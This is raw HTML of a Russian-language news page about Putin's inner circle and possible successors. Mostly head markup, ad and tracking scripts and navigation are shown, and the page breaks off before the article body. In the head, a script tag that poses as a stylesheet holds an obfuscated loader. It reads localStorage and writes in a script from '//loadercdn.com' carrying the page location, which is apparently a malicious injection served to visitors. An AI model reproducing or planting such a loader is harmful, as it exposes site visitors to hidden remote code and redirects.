<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Коллективный Путин и его составные части | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Коллективный Путин и его составные части "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2020/05/cover111.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="284" /><meta property="og:image:alt" content="Коллективный Путин и его составные части " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='videojscss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/video-js.css' type='text/css' media='all' /><link rel='stylesheet' id='videojsimacss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><link rel='stylesheet' id='ldc-like-dislike-css' href='https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Само собой якобы разумеющееся утверждение о том, что Россией правит Путин, 20-летие сидения на московском троне отмечалось в марте нынешнего года, при ближайшем рассмотрение является достаточно сомнительным, во всяком случае это отнюдь не аксиома. В сети имеется достаточно информации о том, что у Путина есть такой себе круг особо приближенных лиц, оказывающих влияние на принятие им решений, мнение которых он учитывает. Все это вполне в российских традициях, где со времен московских царей существовали так называемые ближние бояре. Не менее, возможно, даже более важным вопрос окружения Путина видится в свете продления или не продления им своих полномочий после истечения нынешней каденции в 2024 году, а также в смысле определения преемника Путина на московском «троне», тем более что ходят слухи о его более раннем отходе от дел…" /><meta property="og:description" content="Само собой якобы разумеющееся утверждение о том, что Россией правит Путин, 20-летие сидения на московском троне отмечалось в марте нынешнего года, при ближайшем рассмотрение является достаточно сомнительным, во всяком случае это отнюдь не аксиома. В сети имеется достаточно информации о том, что у Путина есть такой себе круг особо приближенных лиц, оказывающих влияние на принятие им решений, мнение которых он учитывает. Все это вполне в российских традициях, где со времен московских царей существовали так называемые ближние бояре. Не менее, возможно, даже более важным вопрос окружения Путина видится в свете продления или не продления им своих полномочий после истечения нынешней каденции в 2024 году, а также в смысле определения преемника Путина на московском «троне», тем более что ходят слухи о его более раннем отходе от дел…" /><meta name="keywords" content="бортников,вайно,золотов,кгб,ковальчук,москва,нарышкин,окружение путина,патрушев,преемник путина,путин,россия,сергей иванов,политика,топ-статьи" /><link rel="canonical" href="https://enovosty.com/politika/full/1905-kollektivnyj-putin-i-ego-sostavnye-chasti" /><meta property="og:url" content="https://enovosty.com/politika/full/1905-kollektivnyj-putin-i-ego-sostavnye-chasti" /><style>.ms-parent-id-5 > .master-slider{background:#000000}.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><link rel="amphtml" href="https://enovosty.com/politika/full/1905-kollektivnyj-putin-i-ego-sostavnye-chasti?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4805539';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4805539&amp;a=1608" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
data-inv="//ads.go2net.com.ua/"
data-r="single"
data-sender="go2net"
data-bundle="desktop"></script><meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src="//www.googletagservices.com/tag/js/gpt.js"></script><script async src="//acdn.adnxs.com/prebid/not-for-prod/prebid.js"></script><script>var div_1_sizes = [
[240, 320],[240, 350],[240, 420],[240, 500],[240, 600],[300, 250],[300, 280],[300, 300],[300, 400],[300, 500],[300, 600],[320, 50],[320, 100],[320, 250],[320, 480],[320, 600]
];var div_2_sizes = [
[200, 200],[200, 400],[200, 600],[240, 350],[240, 500],[240, 600],[300, 250],[300, 300],[300, 400],[300, 500],[300, 600]
];var div_3_sizes = [
[240, 350],[240, 500],[300, 250],[300, 600]
];var div_4_sizes = [
[300, 250],[300, 50],[300, 75],[300, 100],[300, 300],[320, 50],[320, 100],[320, 250],[320, 200]
];var PREBID_TIMEOUT = 1000;var FAILSAFE_TIMEOUT = 3000;var adUnits = [{code: '/29636627/enovosty.com_300x600_mob_hb',mediaTypes: {banner: {sizes: div_1_sizes
}},bids: [{bidder: 'admixer',params: {zone: '0aeef458-3e2c-4ffa-b559-7ed3aa2de424'
}},{bidder: 'adtelligent',params: {aid: 525931
}}]
}, {code: '/29636627/enovosty.com_320x250_hb',mediaTypes: {banner: {sizes: div_4_sizes
}},bids: [{bidder: 'admixer',params: {zone: '156e0022-5c98-499e-b4e6-788848e60a3c'
}},{bidder: 'adtelligent',params: {aid: 525931
}}]
}, {code: '/29636627/enovosty.com_300x600_top_hb',mediaTypes: {banner: {sizes: div_2_sizes
}},bids: [{bidder: 'admixer',params: {zone: '9743148c-0bcf-416e-8ab5-55d24689e145'
}},{bidder: 'adtelligent',params: {aid: 525931
}}]
}, {code: '/29636627/enovosty.com_300x600_ukr.net_hb',mediaTypes: {banner: {sizes: div_3_sizes
}},bids: [{bidder: 'admixer',params: {zone: '7af953ae-795d-4e3e-8b55-c1906dcae224'
}},{bidder: 'adtelligent',params: {aid: 525931
}}]
}];// ======== DO NOT EDIT BELOW THIS LINE =========== //
var googletag = googletag || {};googletag.cmd = googletag.cmd || [];googletag.cmd.push(function() {googletag.pubads().disableInitialLoad();});var pbjs = pbjs || {};pbjs.que = pbjs.que || [];pbjs.que.push(function() {pbjs.addAdUnits(adUnits);pbjs.requestBids({bidsBackHandler: initAdserver,timeout: PREBID_TIMEOUT
});});function initAdserver() {if (pbjs.initAdserverSet) return;pbjs.initAdserverSet = true;googletag.cmd.push(function() {pbjs.que.push(function() {pbjs.setTargetingForGPTAsync();googletag.pubads().refresh();});});}// in case PBJS doesn't load
setTimeout(function() {initAdserver();}, FAILSAFE_TIMEOUT);googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_mob_hb', div_1_sizes, 'div-1').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_top_hb', div_2_sizes, 'div-2').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_ukr.net_hb', div_3_sizes, 'div-3').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_320x250_hb', div_4_sizes, 'div-4').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});</script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});globalAml.singleRequest("go2net");});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/politika/full/1905-kollektivnyj-putin-i-ego-sostavnye-chasti?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/politika/full/1905-kollektivnyj-putin-i-ego-sostavnye-chasti?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>26.77</td><td>26.43</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>29.06</td><td>28.38</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.38</td><td>0.30</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>500.14</td><td>0.00</td><td>20:36 19.05.2020</td> </tr> <tr class="tr_white"> <td>UX</td><td>1360.48</td><td>0.98</td><td>17:00 19.05.2020</td> </tr> <tr> <td>RTS</td><td>1177.24</td><td>0.80</td><td>18:51 19.05.2020</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>34.38</td><td>-1.24</td><td style="text-transform:uppercase;">May</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>31.74</td><td>-0.25</td><td style="text-transform:uppercase;">May</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>287.50</td><td>-5.04</td><td style="text-transform:uppercase;">May</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li class="current-menu-item"><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li><li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div class="cls"></div><div id="center" style="width:690px;"><style type="text/css" media="screen"> @import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=2);</style><div class="wiget simple singlePost"> <div itemscope itemtype="https://schema.org/NewsArticle" class="post" id="post-4805539"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/politika/full/1905-kollektivnyj-putin-i-ego-sostavnye-chasti"/><article style="font-size:12pt;"> <h1 itemprop="headline" id="postTitle">Коллективный Путин и его составные части</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/politika">Политика</a> <span>&raquo;</span> Коллективный Путин и его составные части</div><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" 